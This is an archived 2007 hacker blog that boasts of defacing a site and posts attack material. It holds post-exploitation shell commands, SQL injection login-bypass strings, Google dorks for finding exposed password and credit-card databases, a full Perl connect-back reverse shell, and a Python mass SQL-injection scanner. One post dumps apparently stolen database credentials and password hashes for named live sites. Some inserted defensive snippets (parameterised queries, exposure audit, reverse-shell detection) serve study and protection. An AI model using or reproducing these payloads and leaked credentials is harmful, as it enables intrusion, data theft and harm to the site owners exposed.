Sunday, November 25, 2007

http://www.i-putra.com.my/sites/admin/detail.cfm?ID=2
DEFACE AGAIN, DEFACE AGAIN

BETTER THAN SITTING IDLE


HHEHEHEHEHE

Thursday, November 22, 2007

linux commands in shell



cat ./../mainfile.php - Config file.

ls -la - Lists directories.

ifconfig {eth0 etc} - Ipconfig equivalent.

ps aux - Shows running processes.

gcc in_file -o out_file - Compile C file.

cat /etc/passwd - Lists accounts.

sudo - Superuser Do: run a command as root, provided you have perms in /etc/sudoers.

id - Tells you what user you're logged in as.

which wget curl w3m lynx - Checks to see what downloaders are present.

uname -r - Shows all release info (or) cat /etc/release.

uname -a - Shows all kernel info (or) cat /etc/issue.

last -30 - Last 30 logged IPs; can change to desired number.

useradd - Create new user account.

usermod - Modify user account.

w - See who is currently logged on.

locate password.txt - Locates password.txt in current dir; can use *.

rm -rf / - Please be careful with this command, I cannot stress this enough.

arp -a - Lists other machines that are on the same subnet.

lsattr -va - Lists file attributes on a Linux second extended file system.

find / -type f -perm -04000 -ls - Finds suid files.

find . -type f -perm -04000 -ls - Finds suid files in current dir.

find / -type f -perm -02000 -ls - Finds all sgid files.

find / -perm -2 -ls - Finds all writable files and folders.

find . -perm -2 -ls - Finds all writable files and folders in current dir.

find / -type f -name .bash_history - Finds bash history.

netstat -an | grep -i listen - Shows open ports.

cut -d: -f1,2,3 /etc/passwd | grep :: - From memory creates a user with no pass.

find /etc/ -type f -perm -o+w 2> /dev/null - Write in /etc/passwd?

cat /proc/version /proc/cpuinfo - CPU info.

locate gcc - Finds gcc if installed.

set - Display system variables.

echo $path - Echo current path.

lsmod - Dumps kernel modules.

mount/df - Check mounted file system.

rpm -qa - Check patch level for RedHat 7.0.

dmesg - Check hardware info.

cat /etc/syslog.conf - Log file.

uptime - Uptime check.

cat /proc/meminfo - Memory check.

find / -type f -perm -4 -print 2> /dev/null - Find readable files.

find / -type f -perm -2 -print 2> /dev/null - Find writable files.

chmod ### $folder - Chmod folder.

ls -l -b - Verbosely list directories.

Shell Commands




ls -alfi : list the files in a directory or view a file's attributes
cat : view a file's contents
uname -a : show the OS type and version
netstat -tnap : show incoming/outgoing connections, or listening ports
rm -rf : delete a file or directory
cp : copy a file
mv : rename a file or move a file
echo : print the words written after it
w : show the users who are currently logged in
whoami : show our own user
id : show our own user
mkdir : create a new directory
touch : create an empty file
pwd : show the current directory
chown : change file ownership
chmod : change file attributes
last : show the list of users who have logged in
useradd : add a user (root)
userdel : delete a user (root)
usermod : modify a user
passwd : change the password
su : switch to another user
tar -zxvf : extract a tgz or tar.gz file
tar -czf : create a tgz file
wget : fetch data from a site
lwp-download : fetch data from a site
curl : fetch data from a site
fetch : fetch data from a site (bsd)

Wednesday, November 21, 2007

LAN-hacking



Hack Any Network&Computer Without Sned Or Programme[Part2]



Hack Any Network&Computer Without Sned Or Programme[Part1]






Hack with tunneling



Exploit Hacking 2 - Privilege Escalation




Hacking dns server

PSP Hacking 101 - Ep 2 - Attack of the Firmware

Tuesday, November 20, 2007

Finally! The difference between PHP, ASP and other scripting languages.

PHP

PHP uses a blend of interpretation and compilation in order to provide the best mix of performance and flexibility to programmers.

Behind the scenes, PHP compiles your script down to a series of instructions (called opcodes) whenever it is accessed. These instructions are then executed one by one until the script terminates. This is different from conventional compiled languages such as C++ where the code is compiled down to native executable code then that executable is run from then on. Instead, PHP re-compiles your script each time it is requested.

This constant recompilation may seem a waste of processor time, but it is actually not all that bad because you no longer need to worry about hand recompiling your scripts when you make any changes. On the flip side, many scripts take longer to compile than they do to execute!

Furthermore, it provides very quick feedback during development. If you have an error somewhere in your file, PHP will refuse to compile the page until you have fixed the problem, and you are able to step through execution of your code line by line until you find the problem.

The speed hit of regular compilation is nullified entirely by the use of PHP accelerators.

One major advantage to having interpreted code is that all memory used by the script is managed by PHP, and the language automatically cleans up after every script has finished. This means that you do not need to worry about closing database links, freeing memory assigned to images, and so on, because PHP will do it for you. That is not to say you should be lazy and make PHP do all the work - good programmers clean up themselves, and let PHP work as backup in case something is missed.

Perl

Perl is the most popular of the PHP alternatives out there, arguably because it is also the oldest. There is a large installed base of Perl out there; many open-source projects require Perl to be installed to work properly. It has the advantages of being very (very!) flexible, and also having a large collection of modules already written for it. However, it is let down by the fact that it is very easy to write obfuscated and confusing Perl without really realising you are doing so, and this has resulted in such marvels as the annual Obfuscated Perl Contest.

Well-written Perl scripts often look fairly like their PHP equivalent. The major cause for Perl's messy appearance is that many Perl programmers rely on "one-liners" - packing large amounts of functionality into just one line of code. Perl was once described very accurately by its creator, Larry Wall, when he argued that the front cover for his O'Reilly book on Perl should be a camel, saying that Perl was ugly but serviceable, and able to go long distances without much nourishment.

Perl is often a better choice when you want to take advantage of some of the pre-written libraries. CPAN, Perl's library repository, is very big, and there is a huge range of code for you to take, customise, and re-use. Perl also has a very active - and very cool - hacker community around it that's a whole lot of fun to be part of and is really a bedrock of support when you need it. Larry Wall and Damian Conway (both core Perl developers) are both rightfully revered as "alpha geeks" - people who really push the envelope of programming by doing cool new things. They are both very friendly, and attend many conferences year round - go ahead and introduce yourself if you meet them, because they really are fascinating to talk to.

ASP

Active Server Pages (ASP) and ASP.NET is Microsoft's attempt to succeed in the web development market, and comes as standard with their web server, IIS. ASP has been mauled by the open source community ever since it came out, and they gave a variety of reasons: it is proprietary, single platform (Windows), and slow.

I would like to say, "Yes, yes, and yes", but I'm not going to try to pull the wool over your eyes. The reality is that ASP has been implemented on other platforms, and, when running on Windows and Microsoft Internet Information Services (IIS), is actually lightning-fast.

That, coupled with the fact that you can write add-on modules for ASP using Visual Basic and COM, would make the whole solution very attractive indeed if it were not for the fact that ASP only really works well on IIS. On other platforms there are many fewer features, and it generally runs a great deal slower. When running on Windows, the security issues and licensing costs tend to be the most important thing, particularly when an all-Microsoft solution stack is being used.

ASP/ASP.NET is generally favoured when an all-Microsoft stack is in place. When used on Windows, it is very easy to deploy .NET code to ASP.NET pages or even write your ASP pages using C#.

ColdFusion

ColdFusion used to be quite popular back in the hey-days of the dot.com boom because it is developed using a proprietary IDE designed for novice programmers who have no wish to see source code of any complexity.

For such a wizard-oriented system, ColdFusion performs fairly well. Performance is nothing to be desired, but development speed is good. Perhaps ColdFusion's biggest let-down is the price tag - you will certainly need to sit down before you see it. ColdFusion was bought out by Macromedia, and this has served to boost its corporate appeal in places where open-source is still frowned upon.

The main drawback to using ColdFusion is arguably its user-friendliness, which might sound odd at first, but let me clarify. With PHP and Perl, because the languages are so flexible, you have much more control over what happens and why. If something goes wrong in your code, it's normally very easy to track it down and solve the problem, or change your plans and implement a different solution to the same problem. Very often, stock ColdFusion has just one way to solve a problem, and this greatly reduces your control over the solution you make. However, at the very least, you can work using ColdFusion when you are in team with non-technical people.

The biggest advantage to ColdFusion is its IDE and the language it uses, "CFML" (ColdFusion Markup Language) - even junior programmers can learn the system and start making pages quickly. As a result, you will often find ColdFusion in use at very large companies where they use Visual Basic (another easy, but not very powerful or fast language) for offline work.

JSP

Java Servlet Pages has often been considered the "dark horse" in web scripting because at first many thought it would be overkill for the job and yet has managed to get quite a substantial community about it nonetheless. JSP has three key advantages over some of its competitors, which may be why it has done so well:
  1. It uses Java, a language that already has a large skill set of developers and a massive amount of functionality available. Java is also conducive to scalability as it distributes across multiple computers well.
  2. Sun, as well as other members of the community, has worked hard to promote the language and tools that support it, which means that JSP has a lot of backing inside larger enterprises.
  3. It strongly encourages templating of pages for maximum code re-use. Templates for PHP are widely available, but they are a great deal more popular in JSP.

It is a common argument that because JSP is based on Java it scales better than PHP. This is not correct per se in the same way that most other over-generalisations are not correct (yes, I realise that is an over-generalisation too, and hence you are free to enjoy the irony!) - PHP scales perfectly well as long as you write your PHP scripts using the same design patterns you would have used writing your JSPs.

JSP is a popular choice when existing back-end business logic is written in Java also, as this keeps the development team language-homogenous.


From: http://www.hudzilla.org/phpbook/read.php/2_2_5

Tuesday, November 13, 2007

Now I'm online every day. I can hang around on the internet for ages, got DSL installed at home.... rather than sitting around doing nothing, I went straight to browsing and digging through old files scattered all over the place. heheheh, what language, man....

Anyway.... I actually feel I've fallen really far behind on developments in the underground world, security and such (heavy words, eh)..... because I hadn't been ONLINE for a long time... at most online on YM... and that was just for chatting to get rid of stress...


So I went straight into action. eng ing eng...... turning into superman xixixixi.... acting tough..
haven't played with a shell in a long time

after scanning with RFI

got a decent haul

!scan administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path= com_x-shop


$mosConfig_offline = '0';
$mosConfig_host = 'localhost';
$mosConfig_user = 'u_autoscan_d';
$mosConfig_password = '4u705c4n';
$mosConfig_db = 'autoscan_db';
$mosConfig_dbprefix = 'au_';
$mosConfig_lang = 'russian

http://autoscan.com.ua/administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=




Falfrir /neformat = ec7d56ebc5f82e6b922de0bdd1674d16

scanscop = bbd370eda96624f872fa068e195dbd54



DB_TYPE = "mssql";
$DB_HOST = "(local)";
$DB_NAME = "erl2";
$DB_USER = "erl2";
$DB_PASS = "erl2";
$DB_PREFIX = "Erl2_"

http://emis.erl.itri.org.tw:8080/erl2/



$mosConfig_editor = 'htmlarea2';
$mosConfig_offline = '0';
$mosConfig_host = 'localhost';
$mosConfig_user = 'admin';
$mosConfig_password = '2e2us0y2';
$mosConfig_db = 'mo_mswnl';
$mosConfig_dbprefix = 'mos_';


http://www.measurework.nl/mswnl/mambo4/administrator/

admin = c2e8571ba9f9342435385b37f4661506
Erik = b7c86bf6a26cdb6faa9a98bb6b6063a3

SQL injection bypass codes



pass:' union select * from tbluser where '1'='1
--------------------------------------------
user&pass : '<>'1
--------------------------------------------
user&pass : a'or'a'='a
--------------------------------------------
user : '<>1 and fldusername<>'
pass : '
--------------------------------------------
user&pass: ' and 1=1or '1'='1
--------------------------------------------
user : '+(select top 1 fldusername from tbluser)+'
pass : '+(select top 1 fldpassword from tbluser)+'
-------------------------------------------
user&pass: ' not in ('1') and '1'='1
-------------------------------------------
user&pass : 1'<'2
-------------------------------------------
user&pass : ' is not null and '1'='1
------------------------------------------
user :' oror ''='
pass:' oror ''='
------------------------------------------
user/pass :' oorr ''='

' or ' ,a'or'a'='a ,' oror ''='
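
Why strings like these get past a login form, and why bound parameters stop them, shown as an added example that is not part of the original post. It assumes a login check built by string concatenation over a table named `tbluser` with columns `fldusername` and `fldpassword` (names taken from the strings above); the rows, the function names and the use of SQLite are assumptions made for the demonstration.

```python
import hmac
import sqlite3

# (user, pass) pairs copied from the list above.
PAGE_PAYLOADS = [
    ("a'or'a'='a", "a'or'a'='a"),
    ("' is not null and '1'='1", "' is not null and '1'='1"),
    ("' not in ('1') and '1'='1", "' not in ('1') and '1'='1"),
    ("'+(select top 1 fldusername from tbluser)+'",
     "'+(select top 1 fldpassword from tbluser)+'"),
]


def make_db():
    """Constructed in-memory table. Passwords are plaintext only because the
    vulnerable query compares them in SQL; a real system stores salted hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tbluser (fldusername TEXT PRIMARY KEY, fldpassword TEXT)")
    conn.executemany(
        "INSERT INTO tbluser VALUES (?, ?)",
        [("admin", "constructed-admin-pw"), ("alice", "constructed-alice-pw")])
    return conn


def login_concat(conn, user, pw):
    """Vulnerable form: user input becomes part of the SQL text, so a quote
    in the input ends the string literal and the rest is parsed as SQL."""
    sql = ("SELECT fldusername FROM tbluser WHERE fldusername='" + user +
           "' AND fldpassword='" + pw + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_bound(conn, user, pw):
    """Hardened form: input is bound as data and never reaches the parser.
    The password is compared outside SQL, in constant time."""
    row = conn.execute(
        "SELECT fldpassword FROM tbluser WHERE fldusername = ?",
        (user,)).fetchone()
    if row is None:
        return None
    ok = hmac.compare_digest(row[0].encode(), pw.encode())
    return user if ok else None


def classify(login, conn, user, pw):
    """'bypass' = logged in, 'rejected' = clean failure, 'sql-error' = the
    input broke the statement (worth alerting on in application logs)."""
    try:
        return "bypass" if login(conn, user, pw) is not None else "rejected"
    except sqlite3.Error:
        return "sql-error"


def survey():
    """Run every payload pair through both login functions."""
    conn = make_db()
    return [(user,
             classify(login_concat, conn, user, pw),
             classify(login_bound, conn, user, pw))
            for user, pw in PAGE_PAYLOADS]


if __name__ == "__main__":
    for user, concat_result, bound_result in survey():
        print(f"{user!r:50} concat={concat_result:10} bound={bound_result}")
```

The `top 1` pair is SQL Server / Access syntax, so against SQLite it surfaces as a statement error rather than a login; a burst of such errors from a login endpoint is a useful detection signal in its own right.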

Optimizing the Use of Search Engines
by fuhrer
Last Update: 10 July 2004

The internet is a warehouse of information. Almost anything that exists in digital form can be found here. On the internet we can get everything from serious news to pedicab drivers' chatter, from free software to the most expensive, from classical music files to Ikke Nurjanah. There are no limits.

In the underground world, the internet is misused for illegal activities. Hacking, carding and software piracy are nothing new.

But finding exactly what we need is not always easy; it is like looking for a needle in a pile of chaff, unless you can use a search engine effectively.

At present Google (http://www.google.com) is still the most reliable search engine, because it can reach areas that should actually be restricted. Google is so good that searching on the internet has come to be called googling.

This time I will invite you, my fellow countrymen, to learn together how to use Google optimally.

Using Booleans

Those of you who have studied programming will already understand what a boolean is. In Indonesian, boolean probably means something close to logic. Google recognizes several boolean operators, including:

  1. the “+” sign or AND
  2. the “–” sign or NOT
  3. OR

The “+” sign
The “+” (plus) sign or “AND” is used to search the internet for information containing two or more words that we specify, for example:
wallpaper + free + download
Google's results are web pages in which every page contains all three words. A web page that contains only one of them will not be shown by Google.

The “-” sign
If you want information about motorcycles but do not want it to be related to Honda, you can write:
sepeda + motor – honda
The same result is obtained by writing:
sepeda + motor NOT honda
(the word NOT does not have to be written in capital letters).

The “OR” operator
Google's results for two or more words joined by “OR” are the same as if the words were separated by spaces. For example, if you want information about hacking or carding activity in Indonesia, you can write:
indonesia + hacking OR carding.

Phrase Search
A phrase is a group of two or more words. To search for a specific phrase with Google, write the phrase between quotation marks ( “ ), for example:
“Introduction to SQL Injection”.
With that keyword, Google will return documents that contain exactly that phrase. Another example:
“Seventh son of seventh son”.
With that phrase, Google will most likely return the lyrics of an Iron Maiden song. Phrase searches give very sharp results; make sure you master them.

OK, the search techniques above are the basics of finding information on the internet. Although we assumed Google, these techniques can actually be used on almost every search engine. Next we move on to more exciting techniques that only Google can do. Yeah, Google is the best.

Finding Directory Indexes
If a folder or directory does not contain an index file (index.html, index.htm, index.php or index.asp), a list of the files in that folder or directory is displayed, and the title of the page shown becomes “Index of /folder_name”.

For example, if we want to find mp3 files, we can enter the keywords:
“index of” + mp3
“index of” + mp3s

(remember English lessons from junior high school: mp3s is the plural of mp3)
“index of” + mp3 + metallica
“index of” + mp3 + rock

Another example: suppose we want to find the database of an online shop which, who knows, may hold credit card information:
“index of” + mdb
“index of” + shop + mdb
“index of” + order
“index of” + orders + mdb
“index of” + “cgi-bin” + order

Using the filetype keyword
With the filetype keyword we can narrow the search to files with a particular extension, e.g.:
filetype:doc
filetype:mdb
filetype:pdf

Using the site keyword
The site keyword is useful for searching sites within a particular domain; for example, to look for MS Word files on military sites, write:
filetype:doc site:.mil

Other examples:
“index of” + password site:.ac.id
“login.asp” site:.go.au

Using the inurl keyword
The inurl keyword is used to find sites that have a particular URL, for example:
inurl: wwwboard/passwd.txt
A search for that term returns roughly 139 links, each of which displays the strings in the passwd.txt file. Oh, and wwwBoard is a CGI-based message board that by default stores its passwords in the file passwd.txt in the format username:password.

Using the intitle keyword
As we know, every web page has a title. The intitle keyword searches for specific documents whose title is the one we specify, for example:
intitle:"index of" htpasswd
intitle:"admin login”
intitle:"restricted”

Example Applications

Here are some naughty examples of what Google can be used for:
“index of” + admin
“index of” + members
“index of” + account + mdb
“index of” + “accounts.mdb”
inurl:”admin/password.txt”
inurl:”admin/order.txt”
inurl:”shop/orders.log”
inurl:iisadmin
“index of” + “showcode.asp”
“index of” + “EIPC.mdb”
“index of” + “shop.mdb”



read more


www.johnny.ihackstuff.com
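
The article's two exposure conditions, a directory with no index file and a sensitive file name reachable under the web root, can be checked on your own server before a search engine indexes them. The following is an added example, not part of the original article; the index file names and most file name patterns come from the article's text and queries, while the function names and the sample tree are assumptions.

```python
import fnmatch
import os
import tempfile

# Index file names listed in the article.
INDEX_FILES = {"index.html", "index.htm", "index.php", "index.asp"}

# File names drawn from the article's queries (lower-case glob patterns).
SENSITIVE_PATTERNS = ("*.mdb", "passwd.txt", "password.txt", "htpasswd",
                      ".htpasswd", "order.txt", "orders.log")


def audit_docroot(root):
    """Walk a document root and return sorted (kind, url_path) findings.

    'no-index' only means the server *may* generate an "Index of" page for
    that directory; whether it does depends on the web server configuration
    (for example Apache's Options Indexes), so treat it as a candidate.
    """
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel = os.path.relpath(dirpath, root)
        url_dir = "/" if rel == "." else "/" + rel.replace(os.sep, "/")
        names = {name.lower() for name in filenames}
        if not names & INDEX_FILES:
            findings.append(("no-index", url_dir))
        for name in filenames:
            if any(fnmatch.fnmatch(name.lower(), pat)
                   for pat in SENSITIVE_PATTERNS):
                findings.append(
                    ("sensitive-file", url_dir.rstrip("/") + "/" + name))
    return sorted(findings)


def build_sample_docroot(root):
    """Constructed sample tree used only for the demonstration."""
    layout = {
        "index.html": "",
        "admin/index.php": "",
        "admin/password.txt": "",
        "shop/shop.mdb": "",
        "img/logo.png": "",
    }
    for rel_path, content in layout.items():
        full = os.path.join(root, *rel_path.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as handle:
            handle.write(content)


def demo():
    """Audit the constructed tree and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_docroot(root)
        return audit_docroot(root)


if __name__ == "__main__":
    for kind, path in demo():
        print(f"{kind:15} {path}")
```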


Sunday, November 11, 2007

[Perl] Connect Back Shell





#!/usr/bin/perl
use IO::Socket;
# Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90
# Email:LorD@ihsteam.com
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/bash';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF
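
The script above duplicates one TCP socket onto STDIN, STDOUT and STDERR before starting `/bin/bash`, which leaves a recognisable trace on the host: a process whose file descriptors 0, 1 and 2 all point at the same socket inode. The following is an added detection example, not part of the original post; it assumes a Linux `/proc` layout, and the function names and the sample process table are constructed for the demonstration.

```python
import os
import re
import tempfile

SOCKET_LINK = re.compile(r"^socket:\[(\d+)\]$")


def stdio_socket_inode(fd_targets):
    """Return the socket inode if fds 0, 1 and 2 all point at the same
    socket, else None. fd_targets maps fd number -> readlink() target."""
    inodes = set()
    for fd in (0, 1, 2):
        match = SOCKET_LINK.match(fd_targets.get(fd, ""))
        if match is None:
            return None
        inodes.add(match.group(1))
    return inodes.pop() if len(inodes) == 1 else None


def read_fd_targets(pid_dir):
    """Read the symlink targets under <pid_dir>/fd."""
    targets = {}
    fd_dir = os.path.join(pid_dir, "fd")
    for name in os.listdir(fd_dir):
        if name.isdigit():
            try:
                targets[int(name)] = os.readlink(os.path.join(fd_dir, name))
            except OSError:
                pass  # descriptor closed while we were reading
    return targets


def read_comm(pid_dir):
    """Short process name from <pid_dir>/comm, or '?' if unreadable."""
    try:
        with open(os.path.join(pid_dir, "comm")) as handle:
            return handle.read().strip()
    except OSError:
        return "?"


def scan(proc_root="/proc"):
    """Return sorted (pid, comm, socket_inode) for matching processes.

    Services started by inetd-style supervisors also have stdio on a
    socket, so a hit is a lead to investigate, not proof of a backdoor.
    """
    findings = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        pid_dir = os.path.join(proc_root, entry)
        try:
            inode = stdio_socket_inode(read_fd_targets(pid_dir))
        except OSError:
            continue  # process exited, or we lack permission
        if inode is not None:
            findings.append((int(entry), read_comm(pid_dir), inode))
    return sorted(findings)


def build_sample_proc(root):
    """Constructed /proc-like tree: a perl parent and its bash child share
    socket 4242 on stdio; the other two processes are ordinary."""
    sample = {
        "100": ("perl", ["socket:[4242]"] * 3),
        "101": ("bash", ["socket:[4242]"] * 3),
        "200": ("bash", ["/dev/pts/0"] * 3),
        "300": ("sshd", ["/dev/null", "/dev/null", "socket:[777]"]),
    }
    for pid, (comm, links) in sample.items():
        fd_dir = os.path.join(root, pid, "fd")
        os.makedirs(fd_dir)
        with open(os.path.join(root, pid, "comm"), "w") as handle:
            handle.write(comm + "\n")
        for fd, target in enumerate(links):
            os.symlink(target, os.path.join(fd_dir, str(fd)))


def demo():
    """Scan the constructed tree and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_proc(root)
        return scan(root)


if __name__ == "__main__":
    for pid, comm, inode in scan():
        print(f"pid={pid} comm={comm} stdio on socket inode {inode}")
```

Run as root on a live host so other users' `/proc/<pid>/fd` directories are readable; the inode can then be matched against `/proc/net/tcp` to find the remote endpoint.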
[python] SQL Scanner v1.0





#!/usr/bin/python
#SQL Scanner that will collect hosts using a google query. Will add the
#injection code to each host and search for md5 in the source.

#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com

import sys, urllib2, re, sets, time, socket, httplib

def title():
print "\n\t d3hydr8[at]gmail[dot]com SQL Scanner v1.0"
print "\t-----------------------------------------------"

def usage():
title()
print "\n Usage: python SQLscan.py \n"
print "\n Example: python SQLscan.py -g inurl:'.gov' 200 -s '/index.php?offset=-1/**/UNION/**/SELECT/**/1,2,concat(password)/**/FROM/**/TABLE/*' -write sql_found.txt -v\n"
print "\t[options]"
print "\t -g/-google : Searches google for hosts"
print "\t -s/-sql : Vuln. file plux sql injection"
print "\t -w/-write : Writes potential SQL found to file"
print "\t -v/-verbose : Verbose Mode\n"

def StripTags(text):
finished = 0
while not finished:
finished = 1
start = text.find("<")
if start >= 0:
stop = text[start:].find(">")
if stop >= 0:
text = text[:start] + text[start+stop+1:]
finished = 0
return text

def timer():
now = time.localtime(time.time())
return time.asctime(now)

def geturls(query):

counter = 10
urls = []
while counter < int(num):
url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N'
opener = urllib2.build_opener(url)
opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')]
data = opener.open(url).read()
hosts = re.findall(('\w+\.[\w\.\-/]*\.\w+'),StripTags(data))
#Lets add sites found to a list if not already or a google site.
#We don't want to upset the people that got our list for us.
for x in hosts:
if x.find('www') != -1:
x = x[x.find('www'):]
if x not in urls and re.search("google", x) == None:
urls.append(x)
counter += 10
return urls

def tester(victim):

if victim[:7] != "http://":
victim = "http://"+victim.rsplit("/",1)[0]+sql
if verbose ==1:
print "Testing:",victim
try:
source = urllib2.urlopen(victim.rsplit("/",1)[0]+sql, "80").read()
md5s = re.findall("[a-f0-9]"*32,source)
if len(md5s) >= 1:
md5s = list(sets.Set(md5s))
print "\n[!] MD5 Found:",''.join([str(i) for i in victim.split("/",3)[:3]])[5:]
for md5 in md5s:
print "\t[",md5,"]\n"
found_sql.append(victim)
except(socket.timeout, socket.gaierror, socket.error, IOError, ValueError, httplib.BadStatusLine):
pass
except(KeyboardInterrupt):
print "\n[-] Cancelled -",timer(),"\n"
sys.exit(1)
except():
pass

if len(sys.argv) < 6:
    usage()
    sys.exit(1)

for arg in sys.argv[1:]:
    if arg.lower() == "-v" or arg.lower() == "-verbose":
        verbose = 1
    if arg.lower() == "-w" or arg.lower() == "-write":
        txt = sys.argv[int(sys.argv[1:].index(arg))+2]
    if arg.lower() == "-s" or arg.lower() == "-sql":
        sql = sys.argv[int(sys.argv[1:].index(arg))+2]
    if arg.lower() == "-g" or arg.lower() == "-google":
        query = sys.argv[int(sys.argv[1:].index(arg))+2]
        num = sys.argv[int(sys.argv[1:].index(arg))+3]
title()
socket.setdefaulttimeout(10)
found_sql = []
count = 0
print "\n[+] SQL_scan Loaded"
try:
    if verbose ==1:
        print "[+] Verbose Mode On"
except(NameError):
    verbose = 0
    print "[-] Verbose Mode Off"
if sql[:1] != "/":
    sql = "/"+sql
print "[+] SQL:",sql
try:
    if txt:
        print "[+] File:",txt
except(NameError):
    txt = None
    pass
try:
    if num.isdigit() == False:
        print "\n[-] Argument [",num,"] must be a number.\n"
        sys.exit(1)
    else:
        if int(num) <= 10:
            print "\n[-] Argument [",num,"] must be greater than 10.\n"
            sys.exit(1)
except(IndexError):
    print "\n[-] Need number of hosts to collect.\n"
    sys.exit(1)
query = re.sub("\s","+",query)
print "[+] Query:",query
print "[+] Number:",num
print "[+] Querying Google..."
urls = geturls(query)
print "[+] Collected:",len(urls),"hosts"
print "[+] Started:",timer()
print "[+] Scanning hosts..."
print "\n[-] Cancel: Press Ctrl-C"
for url in urls:
    tester(url)
    time.sleep(3)
print "-"*65
print "\n\n[+] Potential SQL found:",len(found_sql),"\n"
time.sleep(3)
if txt != None and len(found_sql) >=1:
    sql_file = open(txt, "a")
    sql_file.writelines("\n\td3hydr8[at]gmail[dot]com SQL Scanner v1.0\n")
    sql_file.writelines("\t------------------------------------------\n\n")
    print "[+] Writing Data:",txt
else:
    print "[-] No data written to disk"
for k in found_sql:
    count+=1
    if txt != None:
        sql_file.writelines("["+str(count)+"] "+k+"\n")
    print "\n["+str(count)+"]",k
print "\n[-] Done -",timer(),"\n"

Saturday, November 10, 2007

[PERL] Inclusion Scanner







#!/usr/bin/perl -w

unlink("results.html");
print "\n \n#Will check a directory for all includes and unsets \n";
print "#Coded by Ironfist (ironsecurity.nl) \n";
print "#Usage: create a folder in your perlfolder and put the files to be scanned in it, next type the folder name below (eg myfolder) \n";
print "#GIVES ERRORS WHEN CHECKING SUBFOLDERS: IGNORE THEM :) \n\n\n";


print "Directory to read? ";
$input = <STDIN>;
chomp ($input);

@files = <$input/*>;

foreach $file (@files) {
print "Checking: " .$file . "\n";


open(MYINPUTFILE, "$file");
while(<MYINPUTFILE>)
{

my($line) = $_;

chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);

}
}
}
@files2 = <$input/*/*>;
foreach $file (@files2) {
print "Checking: " .$file . "\n";


open(MYINPUTFILE, "$file");
while(<MYINPUTFILE>)
{

my($line) = $_;

chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);

}
}
}
@files3 = <$input/*/*/*>;
foreach $file (@files3) {
print "Checking: " .$file . "\n";


open(MYINPUTFILE, "$file");
while(<MYINPUTFILE>)
{

my($line) = $_;

chomp($line);
if(($line =~ m/include_once \$/i) || ($line =~ m/require_once \$/i) || ($line =~ m/include_once\(\$/i) || ($line =~ m/require_once\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/require\(\$/i) || ($line =~ m/require \$/i) || ($line =~ m/include \$/i) || ($line =~ m/include\(\$/i))
{
open(DAT,">>results.html") || die("Cannot Open File");
print DAT "FOUND: $line in $file
";
close(DAT);

}
}
}
@files4 = <$input/*/*/*/*>;
foreach $file (@files4) {
print "Checking: " .$file . "\n";


open(MYINPUTFILE, "$file");
while(<MYINPUTFILE>)
{

my($line) = $_;

chomp($line);
